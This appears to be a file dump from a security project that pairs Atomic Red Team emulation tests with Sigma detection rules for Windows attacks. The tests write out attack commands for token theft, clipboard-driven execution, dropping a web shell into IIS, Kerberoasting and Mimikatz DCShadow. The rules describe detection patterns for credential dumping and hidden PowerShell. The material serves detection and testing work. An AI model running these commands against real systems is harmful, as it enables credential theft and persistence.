Requires Administrator Privileges To Execute Test 10 | supported_platforms: 11 | - windows 12 | input_arguments: 13 | target_user: 14 | description: Username To Steal Token From 15 | type: String 16 | default: SYSTEM 17 | executor: 18 | name: powershell 19 | elevation_required: true 20 | command: | 21 | #list processes by user, 22 | 23 | $owners = @{} 24 | gwmi win32_process |% {$owners[$_.handle] = $_.getowner().user} 25 | get-process | select processname,Id,@{l="Owner";e={$owners[$_.id.tostring()]}} 26 | #Steal Token 27 | . .\src\T1134.ps1 28 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_netsh_fw_add.yml: -------------------------------------------------------------------------------- 1 | title: Netsh 2 | id: cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c 3 | description: Allow Incoming Connections by Port or Application on Windows Firewall 4 | references: 5 | - https://attack.mitre.org/software/S0246/ (Lazarus HARDRAIN) 6 | - https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf 7 | date: 2019/01/29 8 | tags: 9 | - attack.lateral_movement 10 | - attack.command_and_control 11 | - attack.t1090 12 | status: experimental 13 | author: Markus Neis 14 | logsource: 15 | category: process_creation 16 | product: windows 17 | detection: 18 | selection: 19 | CommandLine: 20 | - '*netsh firewall add*' 21 | condition: selection 22 | falsepositives: 23 | - Legitimate administration 24 | level: medium 25 | -------------------------------------------------------------------------------- /elemental/media/atomics/T1115.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1115 3 | display_name: Clipboard Data 4 | attack_link: https://attack.mitre.org/wiki/Technique/T1115 5 | 6 | atomic_tests: 7 | - name: Utilize Clipboard to store or execute commands from 8 | description: | 9 | Add data to clipboard to copy off or execute commands from. 10 | supported_platforms: 11 | - windows 12 | executor: 13 | name: command_prompt 14 | elevation_required: false 15 | command: | 16 | dir | clip 17 | clip < readme.txt 18 | 19 | - name: PowerShell 20 | description: | 21 | Utilize PowerShell to echo a command to clipboard and execute it 22 | supported_platforms: 23 | - windows 24 | executor: 25 | name: powershell 26 | elevation_required: false 27 | command: | 28 | echo Get-Process | clip 29 | Get-Clipboard | iex 30 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_impacket_secretdump.yml: -------------------------------------------------------------------------------- 1 | title: Possible Impacket SecretDump remote activity 2 | id: 252902e3-5830-4cf6-bf21-c22083dfd5cf 3 | description: Detect AD credential dumping using impacket secretdump HKTL 4 | author: Samir Bousseaden 5 | references: 6 | - https://blog.menasec.net/2019/02/threat-huting-10-impacketsecretdump.html 7 | tags: 8 | - attack.credential_access 9 | - attack.t1003 10 | logsource: 11 | product: windows 12 | service: security 13 | description: 'The advanced audit policy setting "Object Access > Audit Detailed File Share" must be configured for Success/Failure' 14 | detection: 15 | selection: 16 | EventID: 5145 17 | ShareName: \\*\ADMIN$ 18 | RelativeTargetName: 'SYSTEM32\\*.tmp' 19 | condition: selection 20 | falsepositives: 21 | - pentesting 22 | level: high 23 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_susp_dhcp_config.yml: -------------------------------------------------------------------------------- 1 | title: DHCP Server Loaded the CallOut DLL 2 | id: 13fc89a9-971e-4ca6-b9dc-aa53a445bf40 3 | status: experimental 4 | description: This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded 5 | references: 6 | - https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html 7 | - https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx 8 | - https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx 9 | date: 2017/05/15 10 | author: Dimitrios Slamaris 11 | tags: 12 | - attack.defense_evasion 13 | - attack.t1073 14 | logsource: 15 | product: windows 16 | service: system 17 | detection: 18 | selection: 19 | EventID: 1033 20 | condition: selection 21 | falsepositives: 22 | - Unknown 23 | level: critical 24 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/powershell_exe_calling_ps.yml: -------------------------------------------------------------------------------- 1 | title: PowerShell called from an Executable Version Mismatch 2 | id: c70e019b-1479-4b65-b0cc-cd0c6093a599 3 | status: experimental 4 | description: Detects PowerShell called from an executable by the version mismatch method 5 | references: 6 | - https://adsecurity.org/?p=2921 7 | tags: 8 | - attack.defense_evasion 9 | - attack.execution 10 | - attack.t1086 11 | author: Sean Metcalf (source), Florian Roth (rule) 12 | logsource: 13 | product: windows 14 | service: powershell-classic 15 | detection: 16 | selection1: 17 | EventID: 400 18 | EngineVersion: 19 | - '2.*' 20 | - '4.*' 21 | - '5.*' 22 | HostVersion: '3.*' 23 | condition: selection1 24 | falsepositives: 25 | - Penetration Tests 26 | - Unknown 27 | level: high 28 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_malware_dridex.yml: -------------------------------------------------------------------------------- 1 | title: Dridex Process Pattern 2 | id: e6eb5a96-9e6f-4a18-9cdd-642cfda21c8e 3 | status: experimental 4 | description: Detects typical Dridex process patterns 5 | references: 6 | - https://app.any.run/tasks/993daa5e-112a-4ff6-8b5a-edbcec7c7ba3 7 | author: Florian Roth 8 | date: 2019/01/10 9 | tags: 10 | - attack.defense_evasion 11 | - attack.privilege_escalation 12 | - attack.t1055 13 | logsource: 14 | category: process_creation 15 | product: windows 16 | detection: 17 | selection1: 18 | CommandLine: '*\svchost.exe C:\Users\\*\Desktop\\*' 19 | selection2: 20 | ParentImage: '*\svchost.exe*' 21 | CommandLine: 22 | - '*whoami.exe /all' 23 | - '*net.exe view' 24 | condition: 1 of them 25 | falsepositives: 26 | - Unlikely 27 | level: critical 28 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_rdp_localhost_login.yml: -------------------------------------------------------------------------------- 1 | title: RDP Login from localhost 2 | id: 51e33403-2a37-4d66-a574-1fda1782cc31 3 | description: RDP login with localhost source address may be a tunnelled login 4 | references: 5 | - https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html 6 | date: 2019/01/28 7 | modified: 2019/01/29 8 | tags: 9 | - attack.lateral_movement 10 | - attack.t1076 11 | - car.2013-07-002 12 | status: experimental 13 | author: Thomas Patzke 14 | logsource: 15 | product: windows 16 | service: security 17 | detection: 18 | selection: 19 | EventID: 4624 20 | LogonType: 10 21 | SourceNetworkAddress: 22 | - "::1" 23 | - "127.0.0.1" 24 | condition: selection 25 | falsepositives: 26 | - Unknown 27 | level: high 28 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/powershell_suspicious_invocation_generic.yml: -------------------------------------------------------------------------------- 1 | title: Suspicious PowerShell Invocations - Generic 2 | id: 3d304fda-78aa-43ed-975c-d740798a49c1 3 | status: experimental 4 | description: Detects suspicious PowerShell invocation command parameters 5 | tags: 6 | - attack.execution 7 | - attack.t1086 8 | author: Florian Roth (rule) 9 | logsource: 10 | product: windows 11 | service: powershell 12 | detection: 13 | encoded: 14 | - ' -enc ' 15 | - ' -EncodedCommand ' 16 | hidden: 17 | - ' -w hidden ' 18 | - ' -window hidden ' 19 | - ' - windowstyle hidden ' 20 | noninteractive: 21 | - ' -noni ' 22 | - ' -noninteractive ' 23 | condition: all of them 24 | falsepositives: 25 | - Penetration tests 26 | - Very special / sneaky PowerShell scripts 27 | level: high 28 | 29 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_mal_wceaux_dll.yml: -------------------------------------------------------------------------------- 1 | title: WCE wceaux.dll Access 2 | id: 1de68c67-af5c-4097-9c85-fe5578e09e67 3 | status: experimental 4 | description: Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host 5 | author: Thomas Patzke 6 | references: 7 | - https://www.jpcert.or.jp/english/pub/sr/ir_research.html 8 | - https://jpcertcc.github.io/ToolAnalysisResultSheet 9 | tags: 10 | - attack.credential_access 11 | - attack.t1003 12 | - attack.s0005 13 | logsource: 14 | product: windows 15 | service: security 16 | detection: 17 | selection: 18 | EventID: 19 | - 4656 20 | - 4658 21 | - 4660 22 | - 4663 23 | ObjectName: '*\wceaux.dll' 24 | condition: selection 25 | falsepositives: 26 | - Penetration testing 27 | level: critical 28 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_susp_ping_hex_ip.yml: -------------------------------------------------------------------------------- 1 | title: Ping Hex IP 2 | id: 1a0d4aba-7668-4365-9ce4-6d79ab088dfd 3 | description: Detects a ping command that uses a hex encoded IP address 4 | references: 5 | - https://github.com/vysec/Aggressor-VYSEC/blob/master/ping.cna 6 | - https://twitter.com/vysecurity/status/977198418354491392 7 | author: Florian Roth 8 | date: 2018/03/23 9 | tags: 10 | - attack.defense_evasion 11 | - attack.t1140 12 | - attack.t1027 13 | logsource: 14 | category: process_creation 15 | product: windows 16 | detection: 17 | selection: 18 | CommandLine: 19 | - '*\ping.exe 0x*' 20 | - '*\ping 0x*' 21 | condition: selection 22 | fields: 23 | - ParentCommandLine 24 | falsepositives: 25 | - Unlikely, because no sane admin pings IP addresses in a hexadecimal form 26 | level: high 27 | -------------------------------------------------------------------------------- /elemental/media/atomics/T1100.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1100 3 | display_name: Web Shell 4 | 5 | atomic_tests: 6 | - name: Web Shell Written to Disk 7 | description: | 8 | This test simulates an adversary leveraging Web Shells by simulating the file modification to disk. 9 | Idea from APTSimulator. 10 | cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx 11 | 12 | supported_platforms: 13 | - windows 14 | input_arguments: 15 | web_shell_path: 16 | description: The path to drop the web shell 17 | type: string 18 | default: C:\inetpub\wwwroot 19 | web_shells: 20 | description: Path of Web Shell 21 | type: path 22 | default: PathToAtomicsFolder\T1100\shells\ 23 | executor: 24 | name: command_prompt 25 | command: | 26 | xcopy #{web_shells} #{web_shell_path} 27 | -------------------------------------------------------------------------------- /elemental/media/atomics/T1124.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1124 3 | display_name: System Time Discovery 4 | 5 | atomic_tests: 6 | - name: System Time Discovery 7 | description: | 8 | Identify the system time 9 | 10 | supported_platforms: 11 | - windows 12 | 13 | input_arguments: 14 | computer_name: 15 | description: computer name to query 16 | type: string 17 | default: localhost 18 | 19 | executor: 20 | name: command_prompt 21 | elevation_required: false 22 | command: | 23 | net time \\#{computer_name} 24 | w32tm /tz 25 | 26 | - name: System Time Discovery - PowerShell 27 | description: | 28 | Identify the system time via PowerShell 29 | 30 | supported_platforms: 31 | - windows 32 | 33 | executor: 34 | name: powershell 35 | elevation_required: false 36 | command: | 37 | Get-Date 38 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_cmdkey_recon.yml: -------------------------------------------------------------------------------- 1 | title: Cmdkey Cached Credentials Recon 2 | id: 07f8bdc2-c9b3-472a-9817-5a670b872f53 3 | status: experimental 4 | description: Detects usage of cmdkey to look for cached credentials 5 | references: 6 | - https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation 7 | - https://technet.microsoft.com/en-us/library/cc754243(v=ws.11).aspx 8 | author: jmallette 9 | tags: 10 | - attack.credential_access 11 | - attack.t1003 12 | logsource: 13 | category: process_creation 14 | product: windows 15 | detection: 16 | selection: 17 | Image: '*\cmdkey.exe' 18 | CommandLine: '* /list *' 19 | condition: selection 20 | fields: 21 | - CommandLine 22 | - ParentCommandLine 23 | - User 24 | falsepositives: 25 | - Legitimate administrative tasks. 26 | level: low 27 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_susp_svchost.yml: -------------------------------------------------------------------------------- 1 | title: Suspicious Svchost Process 2 | id: 01d2e2a1-5f09-44f7-9fc1-24faa7479b6d 3 | status: experimental 4 | description: Detects a suspicious svchost process start 5 | tags: 6 | - attack.defense_evasion 7 | - attack.t1036 8 | author: Florian Roth 9 | date: 2017/08/15 10 | logsource: 11 | category: process_creation 12 | product: windows 13 | detection: 14 | selection: 15 | Image: '*\svchost.exe' 16 | filter: 17 | ParentImage: 18 | - '*\services.exe' 19 | - '*\MsMpEng.exe' 20 | - '*\Mrt.exe' 21 | - '*\rpcnet.exe' 22 | filter_null: 23 | ParentImage: null 24 | condition: selection and not filter and not filter_null 25 | fields: 26 | - CommandLine 27 | - ParentCommandLine 28 | falsepositives: 29 | - Unknown 30 | level: high 31 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_usb_device_plugged.yml: -------------------------------------------------------------------------------- 1 | title: USB Device Plugged 2 | id: 1a4bd6e3-4c6e-405d-a9a3-53a116e341d4 3 | description: Detects plugged USB devices 4 | references: 5 | - https://df-stream.com/2014/01/the-windows-7-event-log-and-usb-device/ 6 | - https://www.techrepublic.com/article/how-to-track-down-usb-flash-drive-usage-in-windows-10s-event-viewer/ 7 | status: experimental 8 | author: Florian Roth 9 | tags: 10 | - attack.initial_access 11 | - attack.t1200 12 | logsource: 13 | product: windows 14 | service: driver-framework 15 | detection: 16 | selection: 17 | EventID: 18 | - 2003 # Loading drivers 19 | - 2100 # Pnp or power management 20 | - 2102 # Pnp or power management 21 | condition: selection 22 | falsepositives: 23 | - Legitimate administrative activity 24 | level: low 25 | -------------------------------------------------------------------------------- /elemental/media/atomics/T1208.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1208 3 | display_name: Kerberoasting 4 | 5 | atomic_tests: 6 | - name: Request for service tickets 7 | description: | 8 | This test uses the Powershell Empire Module: https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1 9 | 10 | The following are further sources and credits for this attack: 11 | [Kerberoasting Without Mimikatz source] (https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/) 12 | [Invoke-Kerberoast source] (https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/) 13 | 14 | supported_platforms: 15 | - windows 16 | 17 | executor: 18 | name: powershell 19 | elevation_required: false 20 | command: | 21 | Import-Module .\Invoke-Kerberoast.ps1 22 | Invoke-Kerberoast | fl 23 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/sysmon_mimikatz_trough_winrm.yml: -------------------------------------------------------------------------------- 1 | title: Mimikatz through Windows Remote Management 2 | id: aa35a627-33fb-4d04-a165-d33b4afca3e8 3 | description: Detects usage of mimikatz through WinRM protocol by monitoring access to lsass process by wsmprovhost.exe. 4 | references: 5 | - https://pentestlab.blog/2018/05/15/lateral-movement-winrm/ 6 | status: stable 7 | author: Patryk Prauze - ING Tech 8 | logsource: 9 | product: windows 10 | service: sysmon 11 | detection: 12 | selection: 13 | EventID: 10 14 | TargetImage: 'C:\windows\system32\lsass.exe' 15 | SourceImage: 'C:\Windows\system32\wsmprovhost.exe' 16 | condition: selection 17 | tags: 18 | - attack.credential_access 19 | - attack.execution 20 | - attack.t1003 21 | - attack.t1028 22 | - attack.s0005 23 | falsepositives: 24 | - low 25 | level: high 26 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_susp_dnx.yml: -------------------------------------------------------------------------------- 1 | title: Application Whitelisting bypass via dnx.exe 2 | id: 81ebd28b-9607-4478-bf06-974ed9d53ed7 3 | status: experimental 4 | description: Execute C# code located in the consoleapp folder 5 | references: 6 | - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OtherMSBinaries/Csi.yml 7 | - https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/ 8 | author: Beyu Denis, oscd.community 9 | date: 2019/10/26 10 | modified: 2019/11/04 11 | tags: 12 | - attack.defense_evasion 13 | - attack.execution 14 | - attack.t1218 15 | level: medium 16 | logsource: 17 | category: process_creation 18 | product: windows 19 | detection: 20 | selection: 21 | Image|endswith: '\dnx.exe' 22 | condition: selection 23 | falsepositives: 24 | - Legitimate use of dnx.exe by legitimate user 25 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_susp_interactive_logons.yml: -------------------------------------------------------------------------------- 1 | title: Interactive Logon to Server Systems 2 | id: 3ff152b2-1388-4984-9cd9-a323323fdadf 3 | description: Detects interactive console logons to 4 | author: Florian Roth 5 | tags: 6 | - attack.lateral_movement 7 | - attack.t1078 8 | logsource: 9 | product: windows 10 | service: security 11 | detection: 12 | selection: 13 | EventID: 14 | - 528 15 | - 529 16 | - 4624 17 | - 4625 18 | LogonType: 2 19 | ComputerName: 20 | - '%ServerSystems%' 21 | - '%DomainControllers%' 22 | filter: 23 | LogonProcessName: Advapi 24 | ComputerName: '%Workstations%' 25 | condition: selection and not filter 26 | falsepositives: 27 | - Administrative activity via KVM or ILO board 28 | level: medium 29 | 30 | 31 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_susp_psr_capture_screenshots.yml: -------------------------------------------------------------------------------- 1 | title: psr.exe capture screenshots 2 | id: 2158f96f-43c2-43cb-952a-ab4580f32382 3 | status: experimental 4 | description: The psr.exe captures desktop screenshots and saves them on the local machine 5 | references: 6 | - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/LOLUtilz/OSBinaries/Psr.yml 7 | - https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf 8 | author: Beyu Denis, oscd.community 9 | date: 2019/10/12 10 | modified: 2019/11/04 11 | tags: 12 | - attack.persistence 13 | - attack.t1218 14 | level: medium 15 | logsource: 16 | category: process_creation 17 | product: windows 18 | detection: 19 | selection: 20 | Image|endswith: '\Psr.exe' 21 | CommandLine|contains: '/start' 22 | condition: selection 23 | falsepositives: 24 | - Unknown 25 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_susp_schtask_creation.yml: -------------------------------------------------------------------------------- 1 | title: Scheduled Task Creation 2 | id: 92626ddd-662c-49e3-ac59-f6535f12d189 3 | status: experimental 4 | description: Detects the creation of scheduled tasks in user session 5 | author: Florian Roth 6 | logsource: 7 | category: process_creation 8 | product: windows 9 | detection: 10 | selection: 11 | Image: '*\schtasks.exe' 12 | CommandLine: '* /create *' 13 | filter: 14 | User: NT AUTHORITY\SYSTEM 15 | condition: selection and not filter 16 | fields: 17 | - CommandLine 18 | - ParentCommandLine 19 | tags: 20 | - attack.execution 21 | - attack.persistence 22 | - attack.privilege_escalation 23 | - attack.t1053 24 | - attack.s0111 25 | - car.2013-08-001 26 | falsepositives: 27 | - Administrative activity 28 | - Software installation 29 | level: low 30 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/apt_zxshell.yml: -------------------------------------------------------------------------------- 1 | title: ZxShell Malware 2 | id: f0b70adb-0075-43b0-9745-e82a1c608fcc 3 | description: Detects a ZxShell start by the called and well-known function name 4 | author: Florian Roth 5 | references: 6 | - https://www.hybrid-analysis.com/sample/5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16?environmentId=100 7 | tags: 8 | - attack.g0001 9 | - attack.execution 10 | - attack.t1059 11 | - attack.defense_evasion 12 | - attack.t1085 13 | logsource: 14 | category: process_creation 15 | product: windows 16 | detection: 17 | selection: 18 | Command: 19 | - 'rundll32.exe *,zxFunction*' 20 | - 'rundll32.exe *,RemoteDiskXXXXX' 21 | condition: selection 22 | fields: 23 | - CommandLine 24 | - ParentCommandLine 25 | falsepositives: 26 | - Unlikely 27 | level: critical 28 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/net_dns_c2_detection.yml: -------------------------------------------------------------------------------- 1 | title: Possible DNS Tunneling 2 | id: 1ec4b281-aa65-46a2-bdae-5fd830ed914e 3 | status: experimental 4 | description: Normally, DNS logs contain a limited amount of different dns queries for a single domain. This rule detects a high amount of queries for a single domain, 5 | which can be an indicator that DNS is used to transfer data. 6 | references: 7 | - https://zeltser.com/c2-dns-tunneling/ 8 | - https://patrick-bareiss.com/detect-c2-traffic-over-dns-using-sigma/ 9 | author: Patrick Bareiss 10 | date: 2019/04/07 11 | logsource: 12 | product: dns 13 | detection: 14 | selection: 15 | parent_domain: '*' 16 | condition: selection | count(dns_query) by parent_domain > 1000 17 | falsepositives: 18 | - Valid software, which uses dns for transferring data 19 | level: high 20 | tags: 21 | - attack.t1043 22 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/powershell_suspicious_keywords.yml: -------------------------------------------------------------------------------- 1 | title: Suspicious PowerShell Keywords 2 | id: 1f49f2ab-26bc-48b3-96cc-dcffbc93eadf 3 | status: experimental 4 | description: Detects keywords that could indicate the use of some PowerShell exploitation framework 5 | date: 2019/02/11 6 | author: Florian Roth 7 | references: 8 | - https://posts.specterops.io/entering-a-covenant-net-command-and-control-e11038bcf462 9 | tags: 10 | - attack.execution 11 | - attack.t1086 12 | logsource: 13 | product: windows 14 | service: powershell 15 | definition: 'It is recommended to use the new "Script Block Logging" of PowerShell v5 https://adsecurity.org/?p=2277' 16 | detection: 17 | keywords: 18 | Message: 19 | - "*[System.Reflection.Assembly]::Load*" 20 | condition: keywords 21 | falsepositives: 22 | - Penetration tests 23 | level: high 24 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_exploit_cve_2017_8759.yml: -------------------------------------------------------------------------------- 1 | title: Exploit for CVE-2017-8759 2 | id: fdd84c68-a1f6-47c9-9477-920584f94905 3 | description: Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759 4 | references: 5 | - https://www.hybrid-analysis.com/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100 6 | - https://www.reverse.it/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100 7 | tags: 8 | - attack.execution 9 | - attack.t1203 10 | author: Florian Roth 11 | date: 2017/09/15 12 | logsource: 13 | category: process_creation 14 | product: windows 15 | detection: 16 | selection: 17 | ParentImage: '*\WINWORD.EXE' 18 | Image: '*\csc.exe' 19 | condition: selection 20 | falsepositives: 21 | - Unknown 22 | level: critical 23 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_susp_iss_module_install.yml: -------------------------------------------------------------------------------- 1 | title: IIS Native-Code Module Command Line Installation 2 | id: 9465ddf4-f9e4-4ebd-8d98-702df3a93239 3 | description: Detects suspicious IIS native-code module installations via command line 4 | status: experimental 5 | references: 6 | - https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/ 7 | author: Florian Roth 8 | modified: 2012/12/11 9 | tags: 10 | - attack.persistence 11 | - attack.t1100 12 | logsource: 13 | category: process_creation 14 | product: windows 15 | detection: 16 | selection: 17 | CommandLine: 18 | - '*\APPCMD.EXE install module /name:*' 19 | condition: selection 20 | falsepositives: 21 | - Unknown as it may vary from organisation to arganisation how admins use to install IIS modules 22 | level: medium 23 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_susp_ps_appdata.yml: -------------------------------------------------------------------------------- 1 | title: PowerShell Script Run in AppData 2 | id: ac175779-025a-4f12-98b0-acdaeb77ea85 3 | status: experimental 4 | description: Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder 5 | references: 6 | - https://twitter.com/JohnLaTwC/status/1082851155481288706 7 | - https://app.any.run/tasks/f87f1c4e-47e2-4c46-9cf4-31454c06ce03 8 | tags: 9 | - attack.execution 10 | - attack.t1086 11 | author: Florian Roth 12 | date: 2019/01/09 13 | logsource: 14 | category: process_creation 15 | product: windows 16 | detection: 17 | selection: 18 | CommandLine: 19 | - '* /c powershell*\AppData\Local\\*' 20 | - '* /c powershell*\AppData\Roaming\\*' 21 | condition: selection 22 | falsepositives: 23 | - Administrative scripts 24 | level: medium 25 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_spn_enum.yml: -------------------------------------------------------------------------------- 1 | title: Possible SPN Enumeration 2 | id: 1eeed653-dbc8-4187-ad0c-eeebb20e6599 3 | description: Detects Service Principal Name Enumeration used for Kerberoasting 4 | status: experimental 5 | references: 6 | - https://p16.praetorian.com/blog/how-to-use-kerberoasting-t1208-for-privilege-escalation 7 | author: Markus Neis, keepwatch 8 | date: 2018/11/14 9 | tags: 10 | - attack.credential_access 11 | - attack.t1208 12 | logsource: 13 | category: process_creation 14 | product: windows 15 | detection: 16 | selection_image: 17 | Image: '*\setspn.exe' 18 | selection_desc: 19 | Description: '*Query or reset the computer* SPN attribute*' 20 | cmd: 21 | CommandLine: '*-q*' 22 | condition: (selection_image or selection_desc) and cmd 23 | falsepositives: 24 | - Administrator Activity 25 | level: medium 26 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_susp_calc.yml: -------------------------------------------------------------------------------- 1 | title: Suspicious Calculator Usage 2 | id: 737e618a-a410-49b5-bec3-9e55ff7fbc15 3 | description: Detects suspicious use of calc.exe with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion 4 | status: experimental 5 | references: 6 | - https://twitter.com/ItsReallyNick/status/1094080242686312448 7 | author: Florian Roth 8 | date: 2019/02/09 9 | tags: 10 | - attack.defense_evasion 11 | - attack.t1036 12 | logsource: 13 | category: process_creation 14 | product: windows 15 | detection: 16 | selection1: 17 | CommandLine: '*\calc.exe *' 18 | selection2: 19 | Image: '*\calc.exe' 20 | filter2: 21 | Image: '*\Windows\Sys*' 22 | condition: selection1 or ( selection2 and not filter2 ) 23 | falsepositives: 24 | - Unknown 25 | level: high 26 | -------------------------------------------------------------------------------- /elemental/media/atomics/T1207.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1207 3 | display_name: DCShadow 4 | 5 | atomic_tests: 6 | - name: DCShadow - Mimikatz 7 | description: | 8 | Utilize Mimikatz DCShadow method to simulate behavior of a Domain Controller 9 | 10 | [DCShadow](https://www.dcshadow.com/) 11 | [Additional Reference](http://www.labofapenetrationtester.com/2018/04/dcshadow.html) 12 | 13 | supported_platforms: 14 | - windows 15 | 16 | executor: 17 | name: manual 18 | steps: | 19 | 1. Start Mimikatz and use !processtoken (and not token::elevate - as it elevates a thread) to escalate to SYSTEM. 20 | 2. Start another mimikatz with DA privileges. This is the instance which registers a DC and is used to "push" the attributes. 21 | 3. lsadump::dcshadow /object:ops-user19$ /attribute:userAccountControl /value:532480 22 | 4. lsadump::dcshadow /push 23 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/apt_bear_activity_gtr19.yml: -------------------------------------------------------------------------------- 1 | title: Judgement Panda Exfil Activity 2 | id: b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee 3 | description: Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike 4 | references: 5 | - https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/ 6 | author: Florian Roth 7 | date: 2019/02/21 8 | tags: 9 | - attack.credential_access 10 | - attack.t1081 11 | - attack.t1003 12 | logsource: 13 | category: process_creation 14 | product: windows 15 | detection: 16 | selection1: 17 | Image: '*\xcopy.exe' 18 | CommandLine: '* /S /E /C /Q /H \\*' 19 | selection2: 20 | Image: '*\adexplorer.exe' 21 | CommandLine: '* -snapshot "" c:\users\\*' 22 | condition: selection1 or selection2 23 | falsepositives: 24 | - unknown 25 | level: critical 26 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/sysmon_renamed_procdump.yml: -------------------------------------------------------------------------------- 1 | title: Renamed ProcDump 2 | id: 4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67 3 | status: experimental 4 | description: Detects the execution of a renamed ProcDump executable often used by attackers or malware 5 | references: 6 | - https://docs.microsoft.com/en-us/sysinternals/downloads/procdump 7 | author: Florian Roth 8 | date: 2019/11/18 9 | tags: 10 | - attack.defense_evasion 11 | - attack.t1036 12 | logsource: 13 | product: windows 14 | service: sysmon 15 | detection: 16 | selection: 17 | OriginalFileName: 'procdump' 18 | filter: 19 | Image: 20 | - '*\procdump.exe' 21 | - '*\procdump64.exe' 22 | condition: selection and not filter 23 | falsepositives: 24 | - Procdump illegaly bundled with legitimate software 25 | - Weird admins who renamed binaries 26 | level: critical 27 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/sysmon_susp_image_load.yml: -------------------------------------------------------------------------------- 1 | title: Possible Process Hollowing Image Loading 2 | id: e32ce4f5-46c6-4c47-ba69-5de3c9193cd7 3 | status: experimental 4 | description: Detects Loading of samlib.dll, WinSCard.dll from untypical process e.g. through process hollowing by Mimikatz 5 | references: 6 | - https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for.html 7 | author: Markus Neis 8 | date: 2018/01/07 9 | tags: 10 | - attack.defense_evasion 11 | - attack.t1073 12 | logsource: 13 | product: windows 14 | service: sysmon 15 | detection: 16 | selection: 17 | EventID: 7 18 | Image: 19 | - '*\notepad.exe' 20 | ImageLoaded: 21 | - '*\samlib.dll' 22 | - '*\WinSCard.dll' 23 | condition: selection 24 | falsepositives: 25 | - Very likely, needs more tuning 26 | level: high 27 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_susp_ntlm_auth.yml: -------------------------------------------------------------------------------- 1 | title: NTLM Logon 2 | id: 98c3bcf1-56f2-49dc-9d8d-c66cf190238b 3 | status: experimental 4 | description: Detects logons using NTLM, which could be caused by a legacy source or attackers 5 | references: 6 | - https://twitter.com/JohnLaTwC/status/1004895028995477505 7 | - https://goo.gl/PsqrhT 8 | author: Florian Roth 9 | date: 2018/06/08 10 | tags: 11 | - attack.lateral_movement 12 | - attack.t1075 13 | logsource: 14 | product: windows 15 | service: ntlm 16 | definition: Reqiures events from Microsoft-Windows-NTLM/Operational 17 | detection: 18 | selection: 19 | EventID: 8002 20 | CallingProcessName: '*' # We use this to avoid false positives with ID 8002 on other log sources if the logsource isn't set correctly 21 | condition: selection 22 | falsepositives: 23 | - Legacy hosts 24 | level: low 25 | -------------------------------------------------------------------------------- /elemental/media/atomics/T1010.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1010 3 | display_name: Application Window Discovery 4 | 5 | atomic_tests: 6 | - name: List Process Main Windows - C# .NET 7 | description: | 8 | Compiles and executes C# code to list main window titles associated with each process. 9 